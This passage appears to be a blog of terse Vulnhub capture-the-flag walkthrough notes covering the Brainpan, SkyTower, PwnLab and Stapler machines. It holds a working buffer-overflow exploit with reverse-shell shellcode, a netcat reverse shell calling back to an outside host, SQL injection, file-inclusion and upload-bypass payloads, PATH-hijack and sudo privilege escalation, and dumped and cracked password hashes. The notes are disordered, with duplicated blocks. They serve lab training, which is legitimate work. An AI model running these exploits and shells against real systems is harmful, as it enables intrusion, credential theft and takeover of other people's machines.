# 311712F3 JMP ESP
buffer = 'A' * 524 + "\xF3\x12\x17\x31" + "\x90"*16 + payload + "\x90"*(1000-528-len(payload))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(('192.168.1.99', 9999))
s.connect(('192.168.1.97', 9999))
data = s.recv(1024)
s.send(buffer)
s.close()
Linux brainpan 3.5.0-25-generic #39-Ubuntu SMP Mon Feb 25 19:02:34 UTC 2013 i686 i686 i686 GNU/Linux
PRETTY_NAME="Ubuntu quantal (12.10)"
192.168.1.97
#!/usr/bin/python
import socket
# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.90 LPORT=443 EXITFUNC=thread -f python -v payload -b "\x00"
payload = b""
payload += b"\xda\xdc\xbe\x1b\xe9\x6c\x36\xd9\x74\x24\xf4\x58"
payload += b"\x33\xc9\xb1\x12\x31\x70\x17\x03\x70\x17\x83\xf3"
payload += b"\x15\x8e\xc3\x32\x3d\xb8\xcf\x67\x82\x14\x7a\x85"
payload += b"\x8d\x7a\xca\xef\x40\xfc\xb8\xb6\xea\xc2\x73\xc8"
payload += b"\x42\x44\x75\xa0\x94\x1e\x84\x6a\x7d\x5d\x87\x8b"
payload += b"\xc6\xe8\x66\x3b\x5e\xbb\x39\x68\x2c\x38\x33\x6f"
payload += b"\x9f\xbf\x11\x07\x4e\xef\xe6\xbf\xe6\xc0\x27\x5d"
payload += b"\x9e\x97\xdb\xf3\x33\x21\xfa\x43\xb8\xfc\x7d"
#buffer = 'A' * (528-len(payload)) + "DCBA"
# 311712F3 JMP ESP
buffer = 'A' * 524 + "\xF3\x12\x17\x31" + "\x90"*16 + payload + "\x90"*(1000-528-len(payload))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(('192.168.1.99', 9999))
s.connect(('192.168.1.97', 9999))
data = s.recv(1024)
s.send(buffer)
s.close()
Linux brainpan 3.5.0-25-generic #39-Ubuntu SMP Mon Feb 25 19:02:34 UTC 2013 i686 i686 i686 GNU/Linux
PRETTY_NAME="Ubuntu quantal (12.10)"
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash
find / -perm -u=s 2>/dev/null
/usr/local/bin/validate
sudo -l
(root) NOPASSWD: /home/anansi/bin/anansi_util
sudo /home/anansi/bin/anansi_util manual man
!/bin/bash
Thursday, October 10, 2019
Vulnhub: SkyTower: 1
source: https://www.vulnhub.com/entry/skytower-1,96/
192.168.1.100
nmap:
80/tcp open http Apache httpd 2.2.22 ((Debian))
3128/tcp open http-proxy Squid http proxy 3.1.20
proxychains ssh sara@192.168.1.100 “sudo /bin/cat /accounts/* /etc/shadow”
192.168.1.100
nmap:
80/tcp open http Apache httpd 2.2.22 ((Debian))
3128/tcp open http-proxy Squid http proxy 3.1.20
nikto:
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
gobuster:
/background (Status: 200)
/index (Status: 200)
debian 7
sql injection:
email a’ || 1=1 ;#--
password 123
john@skytech.com
username: john
password: hereisjohn
proxychains:
http 192.168.1.100 3128
ssh:
proxychains ssh john@192.168.1.100 cat /etc/passwd
john:x:1000:1000:john,,,:/home/john:/bin/bash
sara:x:1001:1001:,,,:/home/sara:/bin/bash
william:x:1002:1002:,,,:/home/william:/bin/bash
add key:
proxychains ssh-copy-id john@192.168.1.100
reverse shell:
proxychains ssh john@192.168.1.100 “nc 192.168.1.90 443 -e /bin/bash ”
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
head /var/www/login.php:
$db = new mysqli('localhost', 'root', 'root', 'SkyTech');
mysql -uroot -proot SkyTech -sN -e “select * from login”
1 john@skytech.com hereisjohn
2 sara@skytech.com ihatethisjob
3 william@skytech.com senseable
proxychains ssh-copy-id sara@192.168.1.100
proxychains ssh sara@192.168.1.100 sudo -l
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
proxychains ssh sara@192.168.1.100 “sudo /bin/cat /accounts/* /etc/shadow”
proxychains ssh sara@192.168.1.100 “sudo /bin/cat /accounts/* /root/flag.txt”
Vulnhub: PwnLab: init
source: https://www.vulnhub.com/entry/pwnlab-init,158/
192.168.1.95
nmap:
192.168.1.95
nmap:
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
53409/tcp open status 1 (RPC #100024)
111/tcp open rpcbind 2-4 (RPC #100000)
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
53409/tcp open status 1 (RPC #100024)
debian 8 jessie
nikto:
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
local file inclusion:
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
mysql -h192.168.1.95 -uroot -pH4u%QJ_H99 -sN -e "select * from Users.users"
kent Sld6WHVCSkpOeQ== -> JWzXuBJJNy
mike U0lmZHNURW42SQ== -> SIfdsTEn6I
kane aVN2NVltMkdSbw== -> iSv5Ym2GRo
login username kent, password JWzXuBJJNy
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
local file inclusion:
lang ../../../../etc/passwd
john:x:1000:1000:,,,:/home/john:/bin/bash
kent:x:1001:1001:,,,:/home/kent:/bin/bash
mike:x:1002:1002:,,,:/home/mike:/bin/bash
kane:x:1003:1003:,,,:/home/kane:/bin/bash
upload bypass:
http://192.168.1.95/?page=php://filter/convert.base64-encode/resource=upload
use burp, change php-> gif, mime image/gif, add header GIF89a;
get reverse shell:
lang ../upload/xxx.gif
Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux PRETTY_NAME="Debian GNU/Linux 8 (jessie)" privilege escalation: username kane, password iSv5Ym2GRo
Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux PRETTY_NAME="Debian GNU/Linux 8 (jessie)" privilege escalation: username kane, password iSv5Ym2GRo
strings ~/msgmike
export PATH=”/home/kane:$PATH”
echo “/bin/bash -p” > ./cat
chmod +x cat
./msgmike
strings /home/mike/msg2root /bin/echo %s >> /root/messages.txt ./msg2root 1; chmod +s /bin/bash /bin/bash -p
actually I need to create another reverse shell to cat the content of the flag.txt
strings /home/mike/msg2root /bin/echo %s >> /root/messages.txt ./msg2root 1; chmod +s /bin/bash /bin/bash -p
actually I need to create another reverse shell to cat the content of the flag.txt
Wednesday, October 9, 2019
Vulnhub: Stapler: 1
source: https://www.vulnhub.com/entry/stapler-1,150/
192.168.1.94
nmap:
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
mysql -uroot -pplbkac -sN -e “SELECT user_login, user_pass FROM wordpress.wp_users”
John $P$B7889EMq/erHIuZapMB8GEizebcIy9.
Elly $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0
Peter $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0
barry $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0
heather $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10
garry $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1
harry $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0
scott $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1
kathy $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0
tim $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0
ZOE $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1
Dave $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy.
Simon $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0
Abby $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs.
Vicki $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131
Pam $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0
192.168.1.94
nmap:
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain dnsmasq 2.75
80/tcp open http PHP cli server 5.5 or later
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp open doom?
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
maybe ubuntu 16.04
ftp anonymous login:
Harry, make sure to update the banner when you get a chance to show who has access here
cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
nikto -host 192.168.1.94:
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
nikto -host 192.168.1.94 -port 12380 -ssl:
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ /phpmyadmin/: phpMyAdmin directory found
gobuster dir -k -u https://192.168.1.94:12380 -w /usr/share/seclists/Discovery/Web-Content/common.txt -s “200,301,302” -t 4:
/announcements (Status: 301)
/index.html (Status: 200)
/javascript (Status: 301)
/phpmyadmin (Status: 301)
/robots.txt (Status: 200)
enum4linux:
[+] Attempting to map shares on 192.168.1.94
//192.168.1.94/print$ Mapping: DENIED, Listing: N/A
//192.168.1.94/kathy Mapping: OK, Listing: OK
//192.168.1.94/tmp Mapping: OK, Listing: OK
//192.168.1.94/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
smbclient //192.168.1.94/kathy -N
wordpress 4.2.1
hydra:
username SHayslett, password SHayslett
username Drew, password qwerty
ssh:
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
mysql -uroot -pplbkac -sN -e “SELECT user_login, user_pass FROM wordpress.wp_users”
John $P$B7889EMq/erHIuZapMB8GEizebcIy9.
Elly $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0
Peter $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0
barry $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0
heather $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10
garry $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1
harry $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0
scott $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1
kathy $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0
tim $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0
ZOE $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1
Dave $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy.
Simon $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0
Abby $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs.
Vicki $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131
Pam $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0
john-the-ripper:
garry:football harry:monkey scott:cookie kathy:coolgirl barry:washere John:incorrect tim:thumb Pam:0520 heather:passphrase Dave:damachine Elly:ylle ZOE:partyqueen wordpress login username John, password incorrect
garry:football harry:monkey scott:cookie kathy:coolgirl barry:washere John:incorrect tim:thumb Pam:0520 heather:passphrase Dave:damachine Elly:ylle ZOE:partyqueen wordpress login username John, password incorrect
Subscribe to:
Posts (Atom)